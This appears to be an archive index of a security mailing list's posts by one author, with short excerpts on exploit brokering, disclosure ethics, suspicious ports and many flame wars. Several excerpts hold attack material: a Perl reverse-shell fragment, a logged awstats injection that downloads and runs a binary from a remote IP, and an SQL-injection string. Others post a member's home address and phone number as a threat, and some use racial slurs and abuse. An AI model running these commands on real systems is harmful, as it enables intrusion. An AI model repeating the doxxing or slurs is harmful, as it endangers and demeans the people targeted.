Re: [Full-disclosure] connect back PHP hack

name('tcp'); > socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); > connect(SOCKET, $paddr) || die("Error: $!\n"); > open(STDIN, ">&SOCKET"); > open(STDOUT, ">&SOCKET"); > open(STDERR, ">&S

Re: [Full-disclosure] connect back PHP hack

Damn you! I hate being wrong! I'm going to go stand in my corner and pout now. On Feb 10, 2009, at 1:58 PM, Razi Shaban wrote: > On Tue, Feb 10, 2009 at 8:51 PM, Simon Smith > wrote: >> Technically it doesn't decrypt to anything, it decodes. :) >> >&

Re: [Full-disclosure] connect back PHP hack

. > > thx, > > sr. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith s

Re: [Full-disclosure] connect back PHP hack

ack code does. > > any input is much appreciated. > > thx, > > sr. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith

Re: [Full-disclosure] The war in Palestine

> > I hope that I didn’t take much time from you all. > > Brgds…Alaa > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http:

[Full-disclosure] Penetration testing will be dead by 2009 - Mr. Chess

http://snosoft.blogspot.com/2008/12/brian-chess-cto-of-fortify-software.html Simon Smith si...@snosoft.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full

Re: [Full-disclosure] Cyber attacks in alphabetical order? Estonia, Georgia analysis

omigawd gadi! n3td3v wrote: > I've noticed these cyber attacks are in alphabetical order, E, G. > Also, if you turn E, G around you get the initials of Gadi Evron. ;) > > All the best, > > n3td3v > > ___ > Full-Disclosure - We believe in it. > Charter

Re: [Full-disclosure] To disclose or not to disclose

: > I would opt for #1, additionally, contacting CERT and other quasi- > government security organizations would be a plus, they might have > better luck lighting a fire under the theoretical vendors ass... > > elazar > > On Sat, 27 Sep 2008 03:39:34 + Simon Smith <[E

Re: [Full-disclosure] To disclose or not to disclose

you give them a chance to patch the bug > before the script kiddies get in. While it may be possible to > recreate the exploit from the patched code, it is unlikely that > anybody will be able to rush anything out in the few days before the > public advisory. > > >

[Full-disclosure] To disclose or not to disclose

Greetings, I have a theoretical question of ethics for other security professionals that participate in this list. This is not an actual situation, but it is a potentially realistic situation that I'm interested in exploring and finding an acceptable solution to. Supposed a penetra

Re: [Full-disclosure] DIE IN A FIRE post

You must be a bureaucrat. Randal T. Rioux wrote: > On Wed, August 27, 2008 11:34 am, Simon Smith wrote: >> Hi Mike, >> Next time you decide to say something stupid make sure that you do it >> anonymously. >> >> Michael C Shirk >> >> Home: >

Re: [Full-disclosure] DIE IN A FIRE post

Hi Mike, Next time you decide to say something stupid make sure that you do it anonymously. Michael C Shirk Home: 4205 Chapel Gate Pl Belcamp, MD 21017-1636 (410) 273-1377 M. Shirk wrote: > DIE IN A FIRE !!!1!1! > > Shirkdog > ' or 1=1-- > http://www.shirkdog.us > > ---

Re: [Full-disclosure] wow.

Marcin my man, go back and re-read the email... specifically his signature. If you don't get it... well then abandon all hope. ;] Marcin Wielgoszewski wrote: > Logon to non-ssl site, password is same as username, username > convention is described right on the site... > > On Wed, May 28, 2008 a

Re: [Full-disclosure] wow.

And people wonder why they get pwned all the time... Charles Morris wrote: > http://www.sowela.edu/elearning.html > > ... comments? > -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: h

Re: [Full-disclosure] Ford Motors IT Contact

Indeed, that is the IP address. That IP address appears to be bound to some sort of a VPN system for ford. Perhaps its infected VPN users? Michael Holstein wrote: > >> In response to them still being infected with sql slammer and it >> probing my networks regularly. >> > Let me gues

Re: [Full-disclosure] Ford Motors IT Contact

on* <[EMAIL PROTECTED] > <mailto:[EMAIL PROTECTED]>> wrote: > > > On Tue, May 27, 2008 16:46, Simon Smith wrote: > > Does anyone here have a contact for Ford Motors IT Department, > > Specifically for abuse? > > -- > > > &

Re: [Full-disclosure] Snort Signature to detect credit cards

You sure you got that URL right? Ray P wrote: > The free rule sets from http://www.emergingthreats.com have this > capability. Look in the Policy section. > > RAy > > > From: [EMAIL PROTECTED] > To: full-disclo

[Full-disclosure] We've shut down the Exploit Acquisition Program

If you're interested you can read about it here: http://snosoft.blogspot.com/2008/03/exploit-acquisition-program-shut-down.html -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.

Re: [Full-disclosure] Anyone else seeing this?

Thats because you've been writing less you moron. Joey Mengele wrote: > SPAM levels greatly decreased on my servers since Dude Van Doornail > kicked the bucket. Can anyone else confirm this on their equipment? > > > -- > A Trip To New York City Sweepstakes > Enter for your chance to WIN a trip

Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

Again, It wasn't an assumption, it was a suggestion. J. Oquendo wrote: > Simon Smith wrote: >> Ok, >> >> Big deal I typed it wrong once. More significantly, your interpretation >> of what I wrote is inaccurate. Why are you supporting the trolls? > >

Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

Ok, Big deal I typed it wrong once. More significantly, your interpretation of what I wrote is inaccurate. Why are you supporting the trolls? RB wrote: > At least spell 'Libel' correctly for anyone to take you seriously. > You should know vain threats won't help the matter, and will frankly > onl

Re: [Full-disclosure] Brute force attack - need your advice

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Show me proof that you're not talking out of your ass. Andrew A wrote: | How: fistfull of barbituates | Why: he was a fucking failure | | On Feb 12, 2008 9:15 AM, Simon Smith <[EMAIL PROTECTED] | <mailto:[EMAIL PROTECTED]>> wrote: |

[Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 FYI, Lible: An untruthful statement about a person, published in writing or through broadcast media, that injures the person's reputation or standing in the community. Because libel is a tort (a civil wrong), the injured person can bring a lawsuit a

Re: [Full-disclosure] [funsec] in Memory of Dude VanWinkle / Justin Plazzo

What does it take in terms of resources to run a list like Full Disclosure? Does anyone have a head count or a list of resources? -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.

Re: [Full-disclosure] Brute force attack - need your advice

Anyone find any info on how or why Dude passed on? [EMAIL PROTECTED] wrote: > On Tue, 12 Feb 2008 03:21:20 EST, Keith Kilroy said: > >> The only box that is safe is the one unplugged hdd removed and >> destroyed and rest of system locked in a closet. > > Actually, no. :) Some clever guys at UIU

Re: [Full-disclosure] Dude VanWinkle's Death

Joey, For a retard your quasi email forging skills are impressive. You're l33t even! Joey Mengele wrote: > LOLOLOLOL. > > J > > On Mon, 11 Feb 2008 13:18:21 -0500 Simon Smith <[EMAIL PROTECTED]> > wrote: >> Hey Joey, he was a prick but christ man,

Re: [Full-disclosure] Dude VanWinkle's Death

Joey, here's a pic of you that I took on that special day! http://www.movv.com/prvupload/uploads/super_retard_stfu.jpg Paul Schmehl wrote: > --On Monday, February 11, 2008 13:10:09 -0500 Joey Mengele > <[EMAIL PROTECTED]> wrote: > >> LOLOLOL. PICS PICS! >> > > I wouldn't have thought that his

Re: [Full-disclosure] Dude VanWinkle's Death

Amen! Paul Schmehl wrote: > --On Monday, February 11, 2008 13:10:09 -0500 Joey Mengele > <[EMAIL PROTECTED]> wrote: > >> LOLOLOL. PICS PICS! >> > > I wouldn't have thought that his death would be a laughing matter. > Considering > he was only 31, it's rather tragic. (And no, the original po

Re: [Full-disclosure] ASUS Eee PC rooted out of the box

cause we love you reepex! reepex wrote: > Why do I get such nonsense said about me because I point out that Eric > Harrison is a script kiddie, Simon Smith is in need of a new security > team, and throwing 5000 As into a buffer is not hacking :( > > On Feb 9, 2008 10:36 A

Re: [Full-disclosure] ASUS Eee PC rooted out of the box

You would know. ;] reepex wrote: > On Feb 8, 2008 3:15 PM, Erik Harrison <[EMAIL PROTECTED] > > wrote: > > I appreciate knowing that I can visit my friends homes and root > their boxes while they order pizza > wirelessly on their couch. > > > So you can 'r

Re: [Full-disclosure] ASUS Eee PC rooted out of the box

You remind me of fortune. Say something else crafty? Please? :) reepex wrote: > hey simon, > > Are you still looking to replace your security team because of their > inadequacies? You seemed pretty desperate for skilled workers last time > we talked. > > On Feb 8, 2008

Re: [Full-disclosure] Flash that simulates virus scan

Indeed... I've certainly helped to make a fool of me. ;] Dude VanWinkle wrote: > well, confusing reepex with an infosec worker is pretty bad, but we > might let you off the hook this one time. > > Dont let it happen again :-) > > On Dec 9, 2007 3:23 PM, Simon Smith &l

Re: [Full-disclosure] Flash that simulates virus scan

looks like I responded to the wrong person... I'm a fool. reepex wrote: > the first email from simon asking about where i work following a > succesful troll of some random kiddie > > On Oct 31, 2007 4:37 PM, Simon Smith <[EMAIL PROTECTED] > <mailto:[EMAIL PROTE

Re: [Full-disclosure] (no subject)

Hah, ok that was funny, but I'm really going to shut up now cause this thread is pointless. ;. ripping wrote: > pedophilia is pretty serious. > > Simon Smith wrote: >> and yes.. I'll stop playing with the children now. >> >> Simon Smith wrote: >>>

Re: [Full-disclosure] (no subject)

and yes.. I'll stop playing with the children now. Simon Smith wrote: > Forward what ever you want, just make sure to edit it first so that you > don't look like a liar ;) > > dripping wrote: >> I like how he still hasn't responded. >> >> reepex wro

Re: [Full-disclosure] (no subject)

ls were you and that >>> random >>>> from netragard were begging me to work for you? >>>> >>>> On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote: >>>> >>>>> Awww, reepex feels bad because he got turned down..

Re: [Full-disclosure] (no subject)

Your kewl dripping wrote: > porn stars, people who love to drip semen all over women's faces, > etc etc > hopefully you catch my drip. > LOL U C WUT I DID THAR???/// > > any new leet TRU64 EXPLOITS COMIN OUT? > maybe you can actually get HP to like you this time >

Re: [Full-disclosure] (no subject)

Awww, reepex feels bad because he got turned down... ;] reepex wrote: > only simon from snosoft and people from netragard try to hire people > from FD ;) > > apparently they are not too satisfied with their current employees' skills > > On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED] >

Re: [Full-disclosure] [SECUNIA] Vendors still use the "legal" weapon

I would have thought that by this time businesses would be more savvy to the entire vulnerability disclosure process. They don't seem to realize that in most cases its more damaging to try to quash research than it is to accept it with open arms. That is after all because quashing research is nearl

Re: [Full-disclosure] Barbut

Vladis, Got that right... this vulnerability was released ages ago if memory serves right. Whats funny is that I am not using a linux host and I do not use awstats anyway... makes the attack even more pathetic. [EMAIL PROTECTED] wrote: > On Wed, 21 Nov 2007 14:20:22 EST, Simon Smith s

[Full-disclosure] Barbut

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Anyone else seen these really 3l337 attacks? From: 196.212.26.82 GET /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.0 Host: [removed] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

Re: [Full-disclosure] Crafted SYN Packets...

Kelly, SYN packets and ports do not correlate. And yes, SYN is TCP. You should read up on TCP/IP etc so that you understand protocols before posting to mailing lists. Kelly Robinson wrote: > Looking at some suspicious behaviour in our logs... > > If someone sends a packet with the SYN bi

Re: [Full-disclosure] Exploit Brokering

No worries man, I should have been more clear. Thierry Zoller wrote: > Dear Simon, > > SS>> Selling exploits to just anyone is irresponsible. > Fully agree, I interpreted your intial post as being US centric and > based on ethical judgement, hence my comments. No hard feelings =) > > > > --

Re: [Full-disclosure] Exploit Brokering

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 No doubt... [EMAIL PROTECTED] wrote: > On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said: >> Thierry Zoller wrote: >>> Maybe the hostile foreign party for them is the USA. >> Quite possibly and I could think of many reason

Re: [Full-disclosure] Exploit Brokering

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thierry, my comments are below. Thierry Zoller wrote: > Dear Simon, > > Well if it wasn't obvious enough let me rephrase. > >>> SS> What happens if they sell to a hostile >>> SS> foreign party, what could happen to them, etc...? >>> Maybe they perei

Re: [Full-disclosure] Exploit Brokering

> > On Fri, 09 Nov 2007 15:22:01 -0500 Simon Smith <[EMAIL PROTECTED]> > wrote: >> [ This email is in response to all of the emails that I see with >> people >> trying to broker exploits by advertising them on full disclosure >> and >> other public mail

Re: [Full-disclosure] Exploit Brokering

Thierry Zoller wrote: > Dear Simon, > > SS> What happens if they sell to a hostile > SS> foreign party, what could happen to them, etc...? > Maybe they pereive your party as a hostile foreign party, this list is > obviously not based in the US. What's your point? > >> The solution is to work

Re: [Full-disclosure] Exploit Brokering

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 First Answer: Only work with partners that are well established, incorporated, and have a legitimate use for the items that they want to purchase. Do not work with individual buyers/people, there's too much liability and no way to verify that they are

[Full-disclosure] Exploit Brokering

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ This email is in response to all of the emails that I see with people trying to broker exploits by advertising them on full disclosure and other public mailing lists. ] SNOsoft has been legitimately and legally brokering exploits since early 2000, a

Re: [Full-disclosure] Hushmail == Narqz

Ah well, if a friend did that to me... hrm... I'd probably tar and feather him near an open flame. ;] Byron Sonne wrote: Paul, This hardly means that the hushmail crew are "narqz", it just means that they are cooperating with the law like any legitimate business would. > > N

Re: [Full-disclosure] Hushmail == Narqz

Paul, This hardly means that the hushmail crew are "narqz", it just means that they are cooperating with the law like any legitimate business would. If you don't like that then you shouldn't use any services offered by any legitimate business. Good article. Paul Melson wrote: > ht

Re: [Full-disclosure] mac trojan in-the-wild

I beg to differ, a claymore is a bit large... it would have to be something a bit smaller, especially if its a laptop. reepex wrote: > I guess you never heard of full disk encryption, finger print readers, > or caged machines. > > > On Nov 2, 2007 3:51 PM, Dude VanWinkle <[EMAIL PROTECTED] >

Re: [Full-disclosure] Flash that simulates virus scan

Heh... not sure what government you're referring to... btw, you going to answer my earlier question or not? reepex wrote: > dont you listen to pdp ever? the government uses xss and bruteforces > remote desktop logins > > http://seclists.org/fulldisclosure/2007/Oct/0417.html > > pdp: "military gr

Re: [Full-disclosure] .NET REMOTING on port 31337

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Sorry, Bad Troll... no more food... [EMAIL PROTECTED] wrote: > fascinating tell me more > > On Fri, 28 Sep 2007 15:36:07 -0400 Simon Smith <[EMAIL PROTECTED]> > wrote: >> I don't have any techniques...

Re: [Full-disclosure] .NET REMOTING on port 31337

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I don't have any techniques... [EMAIL PROTECTED] wrote: > educate me dude i bet i'll win this one. > > are your techniques more advanced than the anvil ids suite? > > On Fri, 28 Sep 2007 15:22:23 -0400 Simon Smith <[EMA

Re: [Full-disclosure] .NET REMOTING on port 31337

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I do... but I don't have time to explain it to you... its complicated... post-nmap stuff... [EMAIL PROTECTED] wrote: > dunno how do you plan on figuring out what is running there > > On Fri, 28 Sep 2007 15:07:34 -0400 Simon Smith <

Re: [Full-disclosure] .NET REMOTING on port 31337

007 15:01:01 -0400 Simon Smith <[EMAIL PROTECTED]> > wrote: >> No way... > >> are you serious? > >> ;P > >> [EMAIL PROTECTED] wrote: >>> Sounds like you will need to learn how to use debugging and >> other >>> reverse

Re: [Full-disclosure] .NET REMOTING on port 31337

ri, 28 Sep 2007 14:21:52 -0400 Simon Smith <[EMAIL PROTECTED]> > wrote: >> Got output... and it was... no idea what it was... can't paste it >> due to >> confidentiality though. > >> Fabrizio wrote: >>> .NET Remoting is "a generic system for

Re: [Full-disclosure] .NET REMOTING on port 31337

from anywhere to that machine/port. See if > anyone complains. Check any old firewall logs for that port while you're > at it. Then continue your investigation!! > > Fabrizio > > On 9/28/07, *Simon Smith* <[EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]>> > wrote

Re: [Full-disclosure] .NET REMOTING on port 31337

It's part of the .NET framework, > obviously. (not trying to be a smart ass) > > I'm gonna take a wild guess and say it's not a good thing.. > > Connect to it, and see if you get any output, if you haven't already > done so. > > Fabrizio > > >

Re: [Full-disclosure] .NET REMOTING on port 31337

ew the cover on the > assessment a week or two later. > > It's almost always bad, but you may just have an admin with a stupid > sense of humor. > > 31337 should always throw a red flag. > > On 9/28/07, Simon Smith <[EMAIL PROTECTED]> wrote: > > Has anyone ever

[Full-disclosure] .NET REMOTING on port 31337

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it "legitimate"? - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/Tpqf3El

Re: [Full-disclosure] New term "RDV" is born

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it "legitimate"? - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/Tmif3Elv

Re: [Full-disclosure] [Dailydave] Hacking software is lame -- try medical research...

Just like technology research (hacking)... but... if you are the one that finds a cure, you'll make your buck too. M. Shirk wrote: > There is more money to be made in the treatment of a disease, then > actually finding a cure. > > Remind you of anything? > > Shirkdog > ' or 1=1-- > http://www.sh

Re: [Full-disclosure] Symantec Contact?

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I haven't been following this thread, but what about submitting the details to them in the same way that you'd submit a vulnerability. I'd find it hard to believe that they'd just ignore it. Morning Wood wrote: >> What's really Sad is that Symantec do

Re: [Full-disclosure] Media Defender pwned big time

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 This was originally reported to Daily Dave by [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: > After the email leak[1], a phone call was leaked[2], allegedly > between Ben Grodsky of Media Defender and New York State General > Attorney. > > here is a t

Re: [Full-disclosure] Unreal: a movement to block Firefox

Just spoof your userAgent... http://whyfirefoxisblocked.com";); exit(); } ?> mbs wrote: > The whole concept of blocking 12.41% of Internet users (see > http://en.wikipedia.org/wiki/Usage_share_of_web_browsers ) seems > laughable, and a bad idea. > > What I don't find amusing is Chris

Re: [Full-disclosure] What do you guys make of this?

his time, we've got 31337 H4x0rz!" > > Joel Helgeson > 952-858-9111 > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Simon Smith > Sent: Thursday, September 06, 2007 11:47 AM > To: full-disclosure@lists.grok.org.u

[Full-disclosure] What do you guys make of this?

So, whats up with Russia these days? I'm hearing more and more about Russia on the news. Is this just propaganda or is something really going on? http://news.bbc.co.uk/2/hi/uk_news/6957589.stm - simon -- http://www.snosoft.com ___

Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory

I LOVE THE DMCA! Kevin Finisterre (lists) wrote: > heh who would do such a thing? > > Guess we all get to wait and see who the first Guinea pig is gonna be. > > Hope germany has an EFF / Granick floating around to fight off some > of this nonsense. > -KF > > On Aug 28, 2007, at 6:49 PM, Blue

Re: [Full-disclosure] Skype - the voip company

n lenny/sid > using skype version 1.4 Beta and it cannot connect. > > Cheers, > -Nik > > Tonu Samuel wrote: >> On Thu, 2007-08-16 at 22:19 +0200, Fabian Wenk wrote: >>> Hello Simon >>> >>> Simon Smith wrote: >>>> Greetings, >&

[Full-disclosure] Skype - the voip company

Greetings, Does anyone know any more details about the current skype outage, other than what is being presented on their web-site? It appears that all skype-in telephone numbers are reporting "out of service", their downloads are disabled, and login to the service is disabled. Thanks in ad

Re: [Full-disclosure] Halvar Flake denied entry to USA for BlackHat

A president has an affair and we nearly impeach him. Another president ruins the country, destabilizes the middle-east even more, takes away our rights and freedom, yet we keep him in office. What gives? Don't get me wrong, I love the US and all it has to offer me as a citizen, but like most citiz

Re: [Full-disclosure] Am I missing anything ?

My other hand is called Valdis :] On 7/24/07 12:06 PM, "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote: > On Mon, 23 Jul 2007 18:47:33 EDT, "Kevin Finisterre (lists)" said: > >> Yeah... Adriel loves the cock. > > What's he call his *other* hand? :) > > (Well dammit, I got this big bag of Purina

Re: [Full-disclosure] Am I missing anything ?

Oh so now you're calling me old? On 7/23/07 7:37 PM, "Joey Mengele" <[EMAIL PROTECTED]> wrote: > LOLOLOLOLOL. I submit, you have proven your maturity. > > J > > On Mon, 23 Jul 2007 18:48:14 -0400 Simon Smith <[EMAIL PROTECTED]> > wrote: >> R

Re: [Full-disclosure] Am I missing anything ?

ere wrong, I was right, and you are an ignorant jackass who > may or may not have had sexual relations with the Oreo named KF, I > see no need for this thread to continue. > > J > > On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith <[EMAIL PROTECTED]> > wrote: >>

Re: [Full-disclosure] Am I missing anything ?

nfosec mantra 'live by > the niggerdong, die by the niggerdong' > > J > > On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith <[EMAIL PROTECTED]> > wrote: >> Kid, your posts continue to clearly demonstrate your immaturity. >> >> http://www.secur

Re: [Full-disclosure] Am I missing anything ?

/fulldisclosure/2007/Jul/0402.html Its too bad that you're such a coward man... On 7/23/07 5:51 PM, "Joey Mengele" <[EMAIL PROTECTED]> wrote: > Doesn't RFI stand for remote file inclusion you ignorant jackass? > > J > > On Mon, 23 Jul 2007 17:20:56 -0400 Simon Sm

Re: [Full-disclosure] Am I missing anything ?

Local and Remote file inclusion, yes, you are actually missing a bunch of things.. ;) On 7/23/07 1:20 PM, "Deeflàn Chakravarthÿ" <[EMAIL PROTECTED]> wrote: > Hi All, >Just wondered if I am missing anything important. Am planning to give > talk on web security. > Is there any other technique o

Re: [Full-disclosure] An Auction Site for Vulnerabilities

http://www.eweek.com/article2/0,1895,2156528,00.asp On 7/10/07 4:32 PM, "Joey Mengele" <[EMAIL PROTECTED]> wrote: > You're just jealous because you didn't achieve anything in your e- > mail message! > > J > > On Tue, 10 Jul 2007 12:02:52 -0400 ene0toue ene0toue > <[EMAIL PROTECTED]> wrote: >>>

Re: [Full-disclosure] The Auction Site made Forbes.

Hadn't thought about it that way... ;] Let the fun begin. On 7/9/07 4:25 PM, "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote: > On Mon, 09 Jul 2007 15:50:16 EDT, Simon Smith said: >> Guys, >> Thought you might like to see this: >> >> http://

[Full-disclosure] The Auction Site made Forbes.

Guys, Thought you might like to see this: http://www.forbes.com/home/security/2007/07/06/security-software-hacking-tec h-security-cx_ag_0706vulnmarket.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure

Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)

Well, Having read what you write, I¹d also question the ethics behind such a business. If you sell your exploits through that site you do not know who will end up buying the exploits. There is no promise that the exploits will end up in good hands. On 7/6/07 2:57 PM, "the electric" <[EMAIL P

Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

Damn it I hate it when other people are right... On 7/3/07 2:20 PM, "secure poon" <[EMAIL PROTECTED]> wrote: > Old as in, I heard about it June 21, 2007 when the story surfaced... you are > now enlightening us a whole week and a half later.. > > > __

Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome? On 7/2/07 10:12 PM, "secure poon" <[EMAIL PROTECTED]> wrote: > old news.. > > On 7/2/07, Simon Smith <[EMAIL PROTECTED]&

Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

Oh... And the URL would be helpful. :P http://www.computerworld.com/action/article.do?command=viewArticleBasic&arti cleId=9025442&source=NLT_VVR&nlid=37 On 7/2/07 7:20 PM, "Simon Smith" <[EMAIL PROTECTED]> wrote: > So they interview a non-technical, non-email usi

[Full-disclosure] Pentagon Email Servers Hacked

So they interview a non-technical, non-email using person about a hack on the pentagon? *scratches head* SNOsoft Research Team http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://li

[Full-disclosure] ElecN

Trying to get hold of ElecN... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] A Botted Fortune 500 a Day

Just to add my two cents... The fact is that the cost in damages of a single compromise is usually far greater than the cost of implementing and maintaining good security. TJX is a golden example of that. On 4/13/07 11:05 AM, "Jamie Riden" <[EMAIL PROTECTED]> wrote: > Hi Steven, > > I believe

Re: [Full-disclosure] Why Microsoft should make windows open source

I think that anyone who thinks that Microsoft is near an end is being unrealistic. I think that they are going to have to contend with the challenges imposed by open source operating systems and OSX, but they are a software giant. Also remember, Windows is not the only thing that Microsoft makes. T

Re: [Full-disclosure] phishing sites examples "source code"

What kind of research are you doing? On 2/16/07 9:53 AM, "M.B.Jr." <[EMAIL PROTECTED]> wrote: > social-engineering-beggars... > > On 2/16/07, Andres Riancho <[EMAIL PROTECTED]> wrote: >> Hi, >> >> For a research i'm doing I need a somehow "big"(around 100 would be >> nice...) amount of phi

Re: [Full-disclosure] Pedophiles On YouTube (ringleader Irish282)

"murdered" "to death". Isn't that the point of murder? You don't murder someone to life, or to hospitalization. The department of redundancy department... ;] On 2/13/07 10:08 AM, "Siim Põder" <[EMAIL PROTECTED]> wrote: > Yo! > > TheGesus wrote: >> On 2/12/07, Nicholas Winn <[EMAIL PROTECTED]>

Re: [Full-disclosure] New Transport Protocol RFC - Darknet

The fact that you actually have the time in your day to write such trash clearly demonstrates that you have no social life. It must really suck to be a friendless loser. I truly feel bad for you. On 2/10/07 3:56 PM, "Pedro Martinez" <[EMAIL PROTECTED]> wrote: > Darknet is a next generation black

Re: [Full-disclosure] AP report: Hackers attack key Net traffic computers

Amen! On 2/6/07 9:56 PM, "James Matthews" <[EMAIL PROTECTED]> wrote: > Yes they hit the .org servers! Maybe this is a little wake up call for all the > people that don't put money into computer security! > > On 2/6/07, Juha-Matti Laurio <[EMAIL PROTECTED]> wrote: >> According to >> http://seat

Re: [Full-disclosure] PC/Laptop microphones

it. I hate motherfuckers who hide >> behind hushmail to be bigot racist pieces of shit. >> >> Yet you have nothing contributed to the list ass wipe! >> >> >> On Tuesday, January 30, 2007 11:30 AM, [EMAIL PROTECTED] >> wrote: >>> >>> Dat

Re: [Full-disclosure] PC/Laptop microphones

essionals here. > > Need I cite the list charter? > > NIGGERS > > On Mon, 29 Jan 2007 23:29:26 -0500 Simon Smith <[EMAIL PROTECTED]> > wrote: >> Who's paranoid, I'm not paranoid, stop talking about me! >> >> >> On 1/29/07 11:13 PM,

Re: [Full-disclosure] PC/Laptop microphones

Who's paranoid, I'm not paranoid, stop talking about me! On 1/29/07 11:13 PM, "Jim Popovitch" <[EMAIL PROTECTED]> wrote: > On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote: >> On 1/30/07, Jim Popovitch <[EMAIL PROTECTED]> wrote: >>> Given recent info about the US >>> FBIs capabilities to remotely

Re: [Full-disclosure] PC/Laptop microphones

Jim, In all reality you don't have to be an agent to do this. You could just write an exploit that when successfully executed would compromise the target and then fetch an application from a remote site. I'm sure that things like this have been done in the past. Hell imagine what you could do

Re: [Full-disclosure] stompy the session stomper - tool availability

Very cool. On 1/27/07 7:29 AM, "Michal Zalewski" <[EMAIL PROTECTED]> wrote: > Hi all, > > I'd like to announce the availability of 'stompy', a free tool to perform > a fairly detailed black-box assessment of WWW session identifier > generation algorithms. Session IDs are commonly used to track

Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

I know how to bypass the alarm to your house. Should I put it up > for sale and not worry about who buys it or why because it is "none of my > business"? > > Its people like you who give the security profession a bad name. > > Mario > > - Original Message

  1   2   >